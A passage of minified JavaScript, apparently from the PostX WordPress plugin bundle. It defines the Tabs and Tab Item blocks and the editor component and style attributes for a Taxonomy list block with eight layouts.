}'}]},iconColor:{type:"string",default:"#0A0D14",style:[{depends:[{key:"navIcon",condition:"==",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-title-content > .ultp-tab-icon-dropdown > .ultp-tabs-nav-icon > svg { color:{{iconColor}}; color:{{iconColor}}; }'}]},iconHoverColor:{type:"string",default:"#fff",style:[{depends:[{key:"navIcon",condition:"==",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover > .ultp-tab-title-content > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover > .ultp-tab-title-content > .ultp-tab-icon-dropdown > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active > .ultp-tab-title-content > .ultp-tabs-nav-icon > svg,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active > .ultp-tab-title-content > .ultp-tab-icon-dropdown > .ultp-tabs-nav-icon > svg { color:{{iconHoverColor}}; color:{{iconHoverColor}}; }'}]},descTypo:{type:"object",default:{openTypography:1,size:{lg:"12",unit:"px"},height:{lg:"20",unit:"px"},decoration:"none",transform:"",family:"",weight:"400"},style:[{depends:[{key:"navDescription",condition:"==",value:!0}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-desc'}]},descGapTitle:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-desc { margin-top:{{descGapTitle}}; }'}]},descColor:{type:"string",default:"#000",style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .ultp-tab-desc { color: {{descColor}}; }'}]},descHoverColor:{type:"string",default:"#C5C5C5",style:[{selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element:hover > .ultp-tab-desc,\n            .ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element.ultp-tab-active > .ultp-tab-desc { color: {{descHoverColor}}; }'}]},tabBodyGap:{type:"object",default:{lg:"16",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper { gap:{{tabBodyGap}}; }"}]},tabBodyMinHeight:{type:"object",default:{lg:"8",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content > .wp-block-ultimate-post-tab-item { min-height: {{tabBodyMinHeight}}; }"}]},tabBodyBg:{type:"object",default:{openColor:0,type:"color",color:"#10b981",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content> .wp-block-ultimate-post-tab-item "}]},tabBodyBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content> .wp-block-ultimate-post-tab-item "}]},tabBodyRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:""},unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content  > .wp-block-ultimate-post-tab-item { border-radius:{{tabBodyRadius}}; }"}]},tabBodyShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content> .wp-block-ultimate-post-tab-item "}]},tabBodyMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content > .wp-block-ultimate-post-tab-item { margin: {{tabBodyMargin}}; }"}]},tabBodyPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .block-editor-inner-blocks, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content,\n            {{ULTP}}.ultp-tab-accordion-active > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tab-content > .wp-block-ultimate-post-tab-item { padding: {{tabBodyPadding}}; box-sizing: border-box; }"}]},navWrapBg:{type:"object",default:{openColor:0,type:"color",color:"#10b981",size:"cover",repeat:"no-repeat",loop:!0},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper"}]},navWrapBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper"}]},navWrapRadius:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:""},unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { border-radius: {{navWrapRadius}}; }"}]},navWrapPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { padding:{{navWrapPadding}}; }"}]},navWrapMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper { margin:{{navWrapMargin}}; }"}]},enableAutoPlay:{type:"boolean",default:!1},enableProgressBar:{type:"boolean",default:!1,style:[{depends:[{key:"tabChange",condition:"==",value:"autoplay"}]}]},autoPlayDuration:{type:"string",default:"1.5",style:[{depends:[{key:"tabChange",condition:"==",value:"autoplay"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .tab-progressbar { animation-duration: {{autoPlayDuration}}s; }'}]},barBgColor:{type:"object",default:{openColor:1,type:"color",color:"#7167FF",size:"cover",repeat:"no-repeat",loop:!0},style:[{depends:[{key:"tabChange",condition:"==",value:"autoplay"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .tab-progressbar'}]},barBgSize:{type:"object",default:{lg:"4"},style:[{depends:[{key:"tabChange",condition:"==",value:"autoplay"}],selector:'.ultp-tabs-nav[data-tabnavigation="{{ULTP}}"] > .ultp-tabs-nav-element > .tab-progressbar { height: {{barBgSize}}px; top: calc(100% - {{barBgSize}}px) }'}]},tabResponsive:{type:"string",default:"normal"},tabSliderArrowSize:{type:"object",default:{lg:"16",unit:"px"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow svg, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow svg path, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow svg,\n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow svg path { height:{{tabSliderArrowSize}}; width:{{tabSliderArrowSize}}; }\n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow { padding: calc({{tabSliderArrowSize}} - 8px); }"}]},tabSliderArrowColor:{key:"string",default:"#fff",style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow svg, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow svg { color:{{tabSliderArrowColor}}; }"}]},tabSliderArrowBg:{key:"object",default:{openColor:1,type:"color",color:"#070707"},style:[{selector:"{{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-right-arrow, \n            {{ULTP}} > .ultp-block-wrapper > .ultp-tab-wrapper > .ultp-tabs-nav-wrapper > .ultp-tab-left-arrow"}]},...(0,l(92165).t)(["advanceAttr"],["loadingColor"])}},96519:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(20641),n=l(55350),r=l(88625),s=l(23232);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks,c=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/tabs-block/","block_docs");p(n,{icon:(0,o.createElement)("img",{src:ultp_data.url+"assets/img/blocks/tabs.svg",alt:"Tabs"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Display content in pages/posts under different tabs.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:c},__("Documentation","ultimate-post"))),attributes:i.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/tabs.svg"}},edit:r.Z,save:s.Z})},4015:(e,t,l)=>{"use strict";l.d(t,{Z:()=>v});var o=l(87462),a=l(67294),i=l(53049),n=l(99838);const{__}=wp.i18n,{useEffect:r,useRef:s}=wp.element,{InnerBlocks:p,useBlockProps:c}=wp.blockEditor,{getBlockAttributes:u,getBlockRootClientId:d,getBlockOrder:m,getBlockIndex:g,hasSelectedInnerBlock:y}=wp.data.select("core/block-editor"),{updateBlockAttributes:b}=wp.data.dispatch("core/block-editor"),v=e=>{const{setAttributes:t,name:l,attributes:v,className:h,clientId:f,attributes:{blockId:k,currentPostId:w,advanceId:x,previewImg:T,tabIndex:_,tabActive:C,disableChild:E}}=e;s(null),r((()=>{const e=f.substr(0,6),l=u(d(f));(0,i.qi)(t,l,w,f),k?k&&k!=e&&(l?.hasOwnProperty("ref")||(0,i.k0)()||l?.hasOwnProperty("theme")||t({blockId:e})):t({blockId:e})}),[f]);const S=g(f),P=d(f)||null,{activetab:L}=u(P),I=m(f).length>0;let B;if(r((()=>{L==_||E||((0,i.Gu)(f),(0,i.Gu)(P),b(P,{activetab:_.toLocaleString()}),t({disableChild:!1}))}),[S]),r((()=>{!e.isSelected&&!y(f)||L==_||E||((0,i.Gu)(f),(0,i.Gu)(P),b(P,{activetab:_.toLocaleString()}))}),[e.isSelected,f,L,_,E,P]),r((()=>{t(L==_?{tabActive:!0}:{tabActive:!1})}),[L,_]),k&&(B=(0,n.Kh)(v,"ultimate-post/tab-item",k,(0,i.k0)())),T)return(0,a.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:T});r((()=>{E&&t({disableChild:!1})}),[E]);const U=c({...x&&{id:x},className:`ultp-block-${k} ${h||""} ${C?"active":""}`});return(0,a.createElement)("div",(0,o.Z)({},U,{"data-tabindex":_}),B&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:B}}),(0,a.createElement)(p,{templateLock:!1,renderAppender:I?void 0:()=>(0,a.createElement)(p.ButtonBlockAppender,null)}))}},75775:(e,t,l)=>{"use strict";l.d(t,{Z:()=>r});var o=l(87462),a=l(67294);const{InnerBlocks:i,useBlockProps:n}=wp.blockEditor;function r(e){const{blockId:t,advanceId:l,tabIndex:r,tabActive:s}=e.attributes,p=n.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,a.createElement)("div",(0,o.Z)({},p,{"data-tabindex":r,style:{order:2*Number(r)}}),(0,a.createElement)(i.Content,null))}},10452:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},layout:{type:"string",default:"layout1"},tabIndex:{type:"string",default:""},tabActiveFrontend:{type:"string",default:""},tabActive:{type:"boolean",default:!1},nav_desc:{type:"string",default:""},nav_text:{type:"string",default:""},nav_icon:{type:"string",default:""},disableChild:{type:"boolean",default:!1},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"div:has( > {{ULTP}}) {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]},...l(69735).KF}},35946:(e,t,l)=>{"use strict";var o=l(67294),a=l(4015),i=l(75775),n=l(10452),r=l(71573);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;s(r,{parent:["ultimate-post/tabs"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/tabs.svg",alt:"Tab Item svg"}),attributes:n.Z,edit:a.Z,save:i.Z})},43239:(e,t,l)=>{"use strict";l.d(t,{Z:()=>w});var o=l(67294),a=l(53049),i=l(99838),n=l(92637),r=l(43581),s=l(31760),p=l(25335),c=l(73151);const{__}=wp.i18n,{InspectorControls:u,useBlockProps:d}=wp.blockEditor,{useEffect:m,useState:g,useRef:y,Fragment:b}=wp.element,{Spinner:v,Placeholder:h}=wp.components,{getBlockAttributes:f,getBlockRootClientId:k}=wp.data.select("core/block-editor");function w(e){const t=y(null),[l,w]=g("Content"),[x,T]=g({postsList:[],loading:!0,error:!1}),{setAttributes:_,name:C,clientId:E,className:S,attributes:P,attributes:{blockId:L,advanceId:I,taxGridEn:B,headingText:U,headingStyle:M,headingShow:A,headingAlign:H,headingURL:N,headingBtnText:j,subHeadingShow:Z,subHeadingText:O,taxType:R,previewImg:D,layout:z,headingTag:F,countShow:W,titleShow:V,excerptShow:G,TaxAnimation:q,columns:$,customTaxTitleColor:K,customTaxColor:J,imgCrop:Y,titleTag:X,notFoundMessage:Q,V4_1_0_CompCheck:{runComp:ee},currentPostId:te,taxSlug:le,taxValue:oe,queryNumber:ae}}=e;function ie(){x.error&&T({...x,error:!1}),x.loading||T({...x,loading:!0}),wp.apiFetch({path:"/ultp/specific_taxonomy",method:"POST",data:{taxValue:oe,queryNumber:ae,taxType:R,taxSlug:le,wpnonce:ultp_data.security,archiveBuilder:"archive"==ultp_data.archive?ultp_data.archive:""}}).then((e=>{T({...x,postsList:e,loading:!1})})).catch((e=>{T({...x,loading:!1,error:!0})}))}m((()=>{ie()}),[]),m((()=>{const e=t.current;e?(0,a.Qr)(e,P)&&(ie(),t.current=P):t.current=P}),[P]),m((()=>{const t=E.substr(0,6),l=f(k(E));(0,a.qi)(_,l,te,E),(0,c.h)(e),L?L&&L!=t&&(l?.hasOwnProperty("ref")||(0,a.k0)()||l?.hasOwnProperty("theme")||_({blockId:t})):_({blockId:t})}),[E]);const ne={setAttributes:_,name:C,attributes:P,setSection:w,section:l,clientId:E};let re;L&&(re=(0,i.Kh)(P,"ultimate-post/ultp-taxonomy",L,(0,a.k0)()));const se=d({...I&&{id:I},className:`ultp-block-${L} ${S}`});return(0,o.createElement)(b,null,(0,o.createElement)(u,null,(0,o.createElement)(r.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid6841",store:ne}),(0,o.createElement)(n.Sections,null,(0,o.createElement)(n.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.If,{store:ne,initialOpen:!0,exclude:["contentAlign","openInTab","contentTag"],include:[{position:0,data:{type:"layout",block:"ultp-taxonomy",key:"layout",label:__("Layout","ultimate-post"),options:[{img:"assets/img/layouts/taxonomy/l1.png",label:__("Layout 1","ultimate-post"),value:"1",pro:!1},{img:"assets/img/layouts/taxonomy/l2.png",label:__("Layout 2","ultimate-post"),value:"2",pro:!0},{img:"assets/img/layouts/taxonomy/l3.png",label:__("Layout 3","ultimate-post"),value:"3",pro:!0},{img:"assets/img/layouts/taxonomy/l4.png",label:__("Layout 4","ultimate-post"),value:"4",pro:!0},{img:"assets/img/layouts/taxonomy/l5.png",label:__("Layout 5","ultimate-post"),value:"5",pro:!0},{img:"assets/img/layouts/taxonomy/l6.png",label:__("Layout 6","ultimate-post"),value:"6",pro:!0},{img:"assets/img/layouts/taxonomy/l7.png",label:__("Layout 7","ultimate-post"),value:"7",pro:!0},{img:"assets/img/layouts/taxonomy/l8.png",label:__("Layout 8","ultimate-post"),value:"8",pro:!0}]}},{position:1,data:{type:"toggle",key:"taxGridEn",label:__("Grid View","ultimate-post"),pro:!0}},{position:4,data:{type:"range",key:"rowGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Row Gap","ultimate-post")}},{data:{type:"text",key:"notFoundMessage",label:__("No result found Text","ultimate-post")}}]}),(0,o.createElement)(a.$o,{store:ne}),!ee&&(0,o.createElement)(a.Wh,{store:ne,depend:"headingShow"}),("4"==z||"5"==z)&&(0,o.createElement)(a.Hn,{store:ne,exclude:["imgMargin","imgCropSmall","imgAnimation","imgOverlay","imgOpacity","overlayColor","imgOverlayType","imgGrayScale","imgHoverGrayScale","imgShadow","imgHoverShadow","imgTab","imgHoverRadius","imgRadius","imgSrcset","imgLazy","imageScale"],include:[{position:3,data:{type:"alignment",key:"contentAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0}},{position:2,data:{type:"range",key:"imgSpacing",label:__("Img Spacing","ultimate-post"),min:0,max:100,step:1,responsive:!0}}]}),("1"==z||"4"==z||"5"==z)&&(0,o.createElement)(a.O2,{store:ne,exclude:["contenWraptWidth","contenWraptHeight","contentWrapInnerPadding"],include:[{position:0,data:{type:"select",key:"TaxAnimation",label:__("Hover Animation","ultimate-post"),options:[{value:"none",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"slideLeft",label:__("Slide Left","ultimate-post")},{value:"slideRight",label:__("Slide Right","ultimate-post")}]}}]}),("2"==z||"3"==z||"6"==z||"7"==z||"8"==z)&&(0,o.createElement)(a.HY,{store:ne}),(0,o.createElement)(a.VH,{depend:"titleShow",store:ne,exclude:["titlePosition","titleLength","titleBackground","titleStyle","titleAnimColor"],include:[{position:0,data:{type:"toggle",key:"customTaxTitleColor",label:__("Specific Color","ultimate-post"),pro:!0}},{position:1,data:{type:"alignment",key:"contentTitleAlign",responsive:!1,label:__("Title Align","ultimate-post"),disableJustify:!0}},{position:2,data:{type:"linkbutton",key:"seperatorTaxTitleLink",placeholder:__("Choose Color","ultimate-post"),label:__("Taxonomy Specific (Pro)","ultimate-post"),text:"Choose Color"}},{position:5,data:{type:"color",key:"TitleBgColor",label:__("Background Color","ultimate-post")}},{position:6,data:{type:"color",key:"TitleBgHoverColor",label:__("Hover Background Color","ultimate-post")}},{position:7,data:{type:"color",key:"titleDotColor",label:__("Border Color","ultimate-post")}},{position:8,data:{type:"color",key:"titleDotHoverColor",label:__("Border Hover Color","ultimate-post")}},{position:9,data:{type:"range",key:"titleDotSize",label:__("Border Size","ultimate-post"),min:0,max:5,step:1}},{position:10,data:{type:"select",key:"titleDotStyle",label:__("Border Style","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"solid",label:__("Solid","ultimate-post")},{value:"dashed",label:__("Dashed","ultimate-post")},{value:"dotted",label:__("Dotted","ultimate-post")},{value:"double",label:__("Double","ultimate-post")}]}},{position:11,data:{type:"range",key:"titleRadius",min:0,max:300,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Border Radius","ultimate-post")}}]}),(0,o.createElement)(a.X_,{isTab:!0,store:ne,depend:"excerptShow",exclude:["showSeoMeta","excerptLimit","showFullExcerpt"]}),(0,o.createElement)(a.wT,{store:ne,depend:"countShow"}),!B&&(0,o.createElement)(a.Yp,{depend:"separatorShow",store:ne})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:ne}),(0,o.createElement)(a.Mg,{store:ne}),(0,o.createElement)(a.iv,{store:ne}))),(0,a.dH)()),(0,o.createElement)(s.Z,{include:[{type:"query",taxQuery:!0},{type:"template"},{type:"layout",block:"ultp-taxonomy",key:"layout",options:[{img:"assets/img/layouts/taxonomy/l1.png",label:__("Layout 1","ultimate-post"),value:"1",pro:!1},{img:"assets/img/layouts/taxonomy/l2.png",label:__("Layout 2","ultimate-post"),value:"2",pro:!0},{img:"assets/img/layouts/taxonomy/l3.png",label:__("Layout 3","ultimate-post"),value:"3",pro:!0},{img:"assets/img/layouts/taxonomy/l4.png",label:__("Layout 4","ultimate-post"),value:"4",pro:!0},{img:"assets/img/layouts/taxonomy/l5.png",label:__("Layout 5","ultimate-post"),value:"5",pro:!0},{img:"assets/img/layouts/taxonomy/l6.png",label:__("Layout 6","ultimate-post"),value:"6",pro:!0},{img:"assets/img/layouts/taxonomy/l7.png",label:__("Layout 7","ultimate-post"),value:"7",pro:!0},{img:"assets/img/layouts/taxonomy/l8.png",label:__("Layout 8","ultimate-post"),value:"8",pro:!0}]}],store:ne}),(0,o.createElement)("div",se,re&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:re}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},A&&(0,o.createElement)("div",{className:"ultp-heading-filter"},(0,o.createElement)("div",{className:"ultp-heading-filter-in"},(0,o.createElement)(p.Z,{props:{headingShow:A,headingStyle:M,headingAlign:H,headingURL:N,headingText:U,setAttributes:_,headingBtnText:j,subHeadingShow:Z,subHeadingText:O,headingTag:F}}))),function(){const e=X;return D?(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:D}):x.error?(0,o.createElement)(h,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):x.loading?(0,o.createElement)(h,{label:__("Loading…","ultimate-post")},(0,o.createElement)(v,null)):x.postsList.length>0?(0,o.createElement)("div",{className:"ultp-block-items-wrap"},(0,o.createElement)("ul",{className:`ultp-taxonomy-items ${"none"!=q?"ultp-taxonomy-animation-"+q:""} ultp-taxonomy-column-${$.lg} ultp-taxonomy-layout-${z}`},x.postsList.map(((t,l)=>{const a=t.image?{backgroundImage:`url(${t.image[Y]})`}:{background:`${t.color}`};return(0,o.createElement)("li",{key:l,className:"ultp-block-item ultp-taxonomy-item"},1==z&&(0,o.createElement)(b,null,(0,o.createElement)("a",{href:"#"},V&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:K?{color:t.color}:{}},t.name),W&&(0,o.createElement)("span",{className:"ultp-taxonomy-count",style:K?{color:t.color}:{}},t.count),G&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc))),2==z&&(0,o.createElement)(b,null,(0,o.createElement)("a",{href:"#",style:a},(0,o.createElement)("div",{className:"ultp-taxonomy-lt2-overlay",style:J?{backgroundColor:t.color}:{}}),(0,o.createElement)("div",{className:"ultp-taxonomy-lt2-content"},V&&(0,o.createElement)(b,null,(0,o.createElement)(e,{className:"ultp-taxonomy-name"},t.name),(0,o.createElement)("span",{className:"ultp-taxonomy-bar"})),W&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count)),G&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc))),3==z&&(0,o.createElement)("a",{href:"#"},(0,o.createElement)("div",{className:"ultp-taxonomy-lt3-img",style:a}),(0,o.createElement)("div",{className:"ultp-taxonomy-lt3-overlay",style:J?{backgroundColor:t.color}:{}}),(0,o.createElement)("div",{className:"ultp-taxonomy-lt3-content"},V&&(0,o.createElement)(b,null,(0,o.createElement)(e,{className:"ultp-taxonomy-name"},t.name),(0,o.createElement)("span",{className:"ultp-taxonomy-bar"})),W&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count)),G&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)),4==z&&(0,o.createElement)("a",{href:"#"},t.image&&t.image.full&&(0,o.createElement)("img",{src:t?.image[Y],alt:t.name}),(0,o.createElement)("div",{className:"ultp-taxonomy-lt4-content"},V&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:K?{color:t.color}:{}},t.name),W&&(0,o.createElement)("span",{className:"ultp-taxonomy-count",style:K?{color:t.color}:{}},t.count)),G&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)),5==z&&(0,o.createElement)("a",{href:"#"},t.image&&t.image.full&&(0,o.createElement)("img",{src:t?.image[Y],alt:t.name}),(0,o.createElement)("span",{className:"ultp-taxonomy-lt5-content"},V&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:K?{color:t.color}:{}},t.name),W&&(0,o.createElement)("span",{className:"ultp-taxonomy-count",style:K?{color:t.color}:{}},t.count),G&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc))),6==z&&(0,o.createElement)("a",{href:"#",style:a},(0,o.createElement)("div",{className:"ultp-taxonomy-lt6-overlay",style:J?{backgroundColor:t.color}:{}}),V&&(0,o.createElement)(e,{className:"ultp-taxonomy-name"},t.name),W&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count),G&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)),7==z&&(0,o.createElement)("a",{href:"#",style:a},(0,o.createElement)("div",{className:"ultp-taxonomy-lt7-overlay",style:J?{backgroundColor:t.color}:{}}),V&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:K?{backgroundColor:t.color}:{}},t.name,W&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count)),G&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)),8==z&&(0,o.createElement)("a",{href:"#",style:a},(0,o.createElement)("div",{className:"ultp-taxonomy-lt8-overlay",style:J?{backgroundColor:t.color}:{}}),V&&(0,o.createElement)(e,{className:"ultp-taxonomy-name",style:K?{backgroundColor:t.color}:{}},t.name,W&&(0,o.createElement)("span",{className:"ultp-taxonomy-count"},t.count)),G&&(0,o.createElement)("div",{className:"ultp-taxonomy-desc"},t.desc)))})))):(0,o.createElement)(h,{label:Q})}())))}},60816:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(92165),a=l(73151);const i={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:"1"},taxGridEn:{type:"boolean",default:!0},columns:{type:"object",default:{lg:"1"},style:[{depends:[{key:"taxGridEn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items { grid-template-columns: repeat({{columns}}, 1fr); }"}]},columnGridGap:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"taxGridEn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items { grid-column-gap: {{columnGridGap}}; } \n          {{ULTP}} .ultp-taxonomy-item { margin-bottom: 0; }"}]},rowGap:{type:"object",default:{lg:"20",unit:"px"},style:[{depends:[{key:"taxGridEn",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-taxonomy-items { grid-row-gap: {{rowGap}}; }"}]},titleShow:{type:"boolean",default:!0},headingShow:{type:"boolean",default:!0},excerptShow:{type:"boolean",default:!1},countShow:{type:"boolean",default:!0},openInTab:{type:"boolean",default:!1},notFoundMessage:{type:"string",default:"No Taxonomy Found."},taxType:{type:"string",default:"regular"},taxSlug:{type:"string",default:"category"},taxValue:{type:"string",default:"[]",style:[{depends:[{key:"taxType",condition:"!=",value:["parent","regular"]}]}]},queryNumber:{type:"string",default:6,style:[{depends:[{key:"taxType",condition:"!=",value:"custom"}]}]},imgCrop:{type:"string",default:"yes"==ultp_data.disable_image_size?"full":"ultp_layout_landscape"},imgWidth:{type:"object",default:{lg:"",ulg:"%"},style:[{depends:[{key:"layout",condition:"==",value:["4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-4 a img, \n          {{ULTP}} .ultp-taxonomy-layout-5 a img { max-width: {{imgWidth}}; }"}]},imgHeight:{type:"object",default:{lg:"",unit:"px"},style:[{depends:[{key:"layout",condition:"==",value:["4","5"]}],selector:"{{ULTP}} .ultp-taxonomy-layout-4 a img,  \n          